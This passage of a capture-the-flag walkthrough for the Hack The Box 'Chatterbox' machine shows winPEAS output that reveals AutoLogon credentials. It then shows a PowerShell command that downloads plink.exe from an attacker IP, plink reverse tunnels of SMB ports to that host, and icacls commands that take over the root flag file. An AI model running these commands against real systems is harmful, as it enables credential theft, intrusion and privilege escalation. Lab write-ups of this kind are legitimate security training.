    Not Found

  [+] Chrome bookmarks
    Not Found

  [+] Current IE tabs
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
    Not Found

  [+] Looking for GET credentials in IE history
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history

  [+] IE favorites
    https://ieonline.microsoft.com/#ieslice
    http://go.microsoft.com/fwlink/?LinkId=121315
    http://go.microsoft.com/fwlink/?LinkId=129792
    http://go.microsoft.com/fwlink/?LinkId=129791
    http://go.microsoft.com/fwlink/?LinkId=50893
    http://go.microsoft.com/fwlink/?linkid=44661
    http://go.microsoft.com/fwlink/?linkid=55424
    http://go.microsoft.com/fwlink/?linkid=68920
    http://go.microsoft.com/fwlink/?linkid=140813
    http://go.microsoft.com/fwlink/?LinkId=55143
    http://go.microsoft.com/fwlink/?LinkId=68924
    http://go.microsoft.com/fwlink/?LinkId=68923
    http://go.microsoft.com/fwlink/?LinkId=68921
    http://go.microsoft.com/fwlink/?LinkId=54729
    http://go.microsoft.com/fwlink/?LinkId=68922
    http://go.microsoft.com/fwlink/?LinkId=69172
    http://go.microsoft.com/fwlink/?LinkId=70742
    http://go.microsoft.com/fwlink/?LinkId=68925
    http://go.microsoft.com/fwlink/?LinkId=68927


  ==============================(Interesting files and registry)==============================

  [+] Putty Sessions
    Not Found

  [+] Putty SSH Host keys
    ssh-ed25519@22:10.7.9.200: 
   =================================================================================================


  [+] SSH keys in registry
   [?] If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#ssh-keys-in-registry
    Not Found

  [+] Cloud Credentials
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
    Not Found

  [+] Unnattend Files
    C:\Windows\Panther\Unattend.xml
<Password>*SENSITIVE*DATA*DELETED*</Password>     <Enabled>true</Enabled>      <Username>Alfred</Username>     </AutoLogon>    <UserAccounts>     <LocalAccounts>      <LocalAccount wcm:action="add">       <Password>*SENSITIVE*DATA*DELETED*</Password>

  [+] Powershell History

  [+] Looking for common SAM & SYSTEM backups

  [+] Looking for McAfee Sitelist.xml Files
  [X] Exception: Could not find a part of the path 'C:\Program Files (x86)'.

  [+] Cached GPP Passwords
  [X] Exception: Could not find a part of the path 'C:\ProgramData\Microsoft\Group Policy\History'.

  [+] Looking for possible regs with creds
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#inside-the-registry
    Not Found
    Not Found
    Not Found
    Not Found

  [+] Looking for possible password files in users homes
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files

  [+] Looking inside the Recycle Bin for creds files
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
    Not Found

  [+] Searching known files that can contain creds in home
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files

  [+] Looking for documents --limit 100--
    Not Found

  [+] Recent files --limit 70--
    Not Found

LOGON USING PLINK WITH ALFRED AUTOLOGON CREDENTIALS
  [+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found!!
    DefaultUserName               :  Alfred
    DefaultPassword               :  Welcome1!

C:\Users\Alfred\AppData\Local\Temp>powershell -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.8/plink.exe','C:\Users\Alfred\AppData\Local\Temp\plink.exe')

C:\Users\Alfred\AppData\Local\Temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9034-6528

 Directory of C:\Users\Alfred\AppData\Local\Temp

11/20/2020  10:18 PM    <DIR>          .
11/20/2020  10:18 PM    <DIR>          ..
01/30/2018  04:45 PM           196,608 33E41156-5F58-4EB3-B7AB-2BDE5BB1E1AA.Diagnose.0.etl
01/11/2018  08:08 AM            49,208 Alfred.bmp
12/10/2017  09:18 AM           429,334 dd_vcredistMSI3DCD.txt
12/10/2017  09:18 AM            11,654 dd_vcredistUI3DCD.txt
12/10/2017  09:18 AM                 0 FXSAPIDebugLogFile.txt
12/10/2017  12:15 PM    <DIR>          Low
12/10/2017  12:29 PM            17,490 MpSigStub.log
01/30/2018  04:45 PM    <DIR>          msdt
01/30/2018  03:56 PM             1,302 OutofProcReport322936.txt
11/20/2020  10:18 PM           311,296 plink.exe
12/10/2017  09:12 AM            79,848 storePwd.exe
12/10/2017  09:12 AM                24 storePwd.ini
12/10/2017  12:24 PM               724 StructuredQuery.log
12/10/2017  09:12 AM               555 unattend.cmd
12/10/2017  09:12 AM           608,744 upgrader.exe
12/10/2017  09:19 AM           141,160 vminst.log
12/10/2017  09:19 AM         3,056,962 vmmsi.log_20171210_091915.log
12/10/2017  09:20 AM    <DIR>          vmware-Alfred
12/10/2017  09:18 AM    <DIR>          VNYF584.tmp.dir
11/20/2020  10:14 PM           472,064 winPEAS.exe
12/10/2017  12:05 PM               967 wmsetup.log
11/20/2020  05:15 PM    <DIR>          WPDNSE
12/10/2017  12:17 PM    <DIR>          _avast_
12/10/2017  12:29 PM    <DIR>          {39F6F542-B71F-4AFA-822E-092D2636D1C1}
              18 File(s)      5,513,620 bytes
               9 Dir(s)  18,157,223,936 bytes free

START SSH ON KALI
root@kali:~/htb/chatterbox# service ssh start

UPDATE SSH CONFIG TO USE DIFFERENT SSH PORT 22 AS HTB DISABLED THIS
plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.8:4222

RUN PLINK ON CHATTERBOX 
plink.exe -l root -pw xxxx -R 139:0.0.0.0:139 10.10.14.8
plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.8:4222


C:\Users\Alfred>plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.8
plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.8
FATAL ERROR: Network error: Connection timed out

CHECK DIRECTORY PERMISSIONS
C:\Users\Alfred>icacls C:\Users\Administrator\Desktop
icacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                               CHATTERBOX\Administrator:(I)(OI)(CI)(F)
                               BUILTIN\Administrators:(I)(OI)(CI)(F)
                               CHATTERBOX\Alfred:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files

CHECK ROOT FLAG PERMISSIONS
C:\Users\Alfred>icacls C:\Users\Administrator\Desktop\root.txt
icacls C:\Users\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop\root.txt CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

GRANT READ ACCESS TO ROOT FLAG TO ALFRED
C:\Users\Alfred>icacls root.txt /grant alfred:F
icacls root.txt /grant alfred:F
root.txt: The system cannot find the file specified.
Successfully processed 0 files; Failed processing 1 files

C:\Users\Alfred>icacls C:\Users\Administrator\Desktop\root.txt /grant alfred:F
icacls C:\Users\Administrator\Desktop\root.txt /grant alfred:F
processed file: C:\Users\Administrator\Desktop\root.txt
Successfully processed 1 files; Failed processing 0 files

GET ROOT FLAG

C:\Users\Alfred>type C:\Users\Administrator\Desktop\root.txt
type icacls C:\Users\Administrator\Desktop\root.txt
The system cannot find the file specified.
Error occurred while processing: icacls.

C:\Users\Administrator\Desktop\root.txt


############################################

